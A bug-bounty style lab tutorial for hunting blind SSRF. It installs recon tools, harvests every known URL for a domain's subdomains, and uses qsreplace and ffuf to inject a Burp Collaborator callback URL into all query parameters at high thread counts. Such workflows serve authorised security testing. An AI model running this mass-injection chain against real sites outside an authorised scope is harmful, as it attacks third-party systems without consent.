Finding SSRF (all scope)
The goal of this lab is to collect all subdomains of a target domain, gather every known URL and parameter for them, inject a Burp Collaborator payload into each parameter, and then check Collaborator for out-of-band interactions that indicate blind SSRF.
subfinder: a passive subdomain discovery tool.
How to install it:
GO111MODULE=on go get -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder
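For example, to enumerate subdomains passively and print only the results (example.com is a placeholder target):
subfinder -d example.com -silent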
qsreplace: accepts URLs on stdin and replaces all query string values with a user-supplied value.
How to install it:
go get -u github.com/tomnomnom/qsreplace
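For example, qsreplace rewrites every query string value it sees on stdin (urls.txt is a placeholder file):
cat urls.txt | qsreplace "FUZZ"
# http://example.com/?id=1&q=x becomes http://example.com/?id=FUZZ&q=FUZZ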
gau: Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.
How to install it:
GO111MODULE=on go get -u -v github.com/lc/gau
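For example, to fetch known URLs for a domain and its subdomains (the -subs flag is the one used in the workflow below):
gau -subs example.com > urls.txt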
waybackurls: fetch all URLs that the Wayback Machine knows about for a domain.
How to install it:
go get github.com/tomnomnom/waybackurls
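waybackurls reads domains from stdin, so it chains naturally after subfinder:
echo example.com | waybackurls
subfinder -d example.com -silent | waybackurls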
gf: a wrapper around grep that makes it easier to reuse named search patterns.
How to install it:
go get -u github.com/tomnomnom/gf
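gf looks up pattern files in ~/.gf; assuming an ssrf pattern file is installed (community pattern collections provide one), collected URLs can be pre-filtered for likely SSRF parameters:
cat output.txt | gf ssrf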
Filter to exclude static assets from the fuzz list and keep only the URLs that actually contain the Collaborator payload:
grep -v "\.css?ver" | grep -v "\.js" | grep -v "\.png" | grep -v "\.woff" | grep "collaborator"
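As a sketch of how this chain is applied, assuming the fuzz_list.txt built in the workflow below (filtered.txt is a placeholder name):
cat fuzz_list.txt | grep -v "\.css?ver" | grep -v "\.js" | grep -v "\.png" | grep -v "\.woff" | grep "collaborator" > filtered.txt
ffuf can then be run against filtered.txt instead of the raw list.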
ffuf: a fast web fuzzer written in Go.
How to install it:
go get -u github.com/ffuf/ffuf
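ffuf replaces the FUZZ keyword in the target URL with each wordlist entry; in the typical case that is a path component, e.g.:
ffuf -w wordlist.txt -u https://example.com/FUZZ
In the workflow below, the wordlist contains full URLs and -u is set to FUZZ alone, so ffuf simply requests every line of the list.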
In Scope: *.example.com
To collect all URLs from several sources:
(gau -subs example.com; subfinder -d example.com -silent | waybackurls) | sort -u > output.txt
Replace every query string value with your Burp Collaborator payload:
cat output.txt | qsreplace "http://xxxxxxxxxxx.burpcollaborator.net" >> fuzz_list.txt
Request every URL in the list, then watch the Collaborator client for DNS or HTTP interactions:
ffuf -c -w fuzz_list.txt -u FUZZ -t 200 -r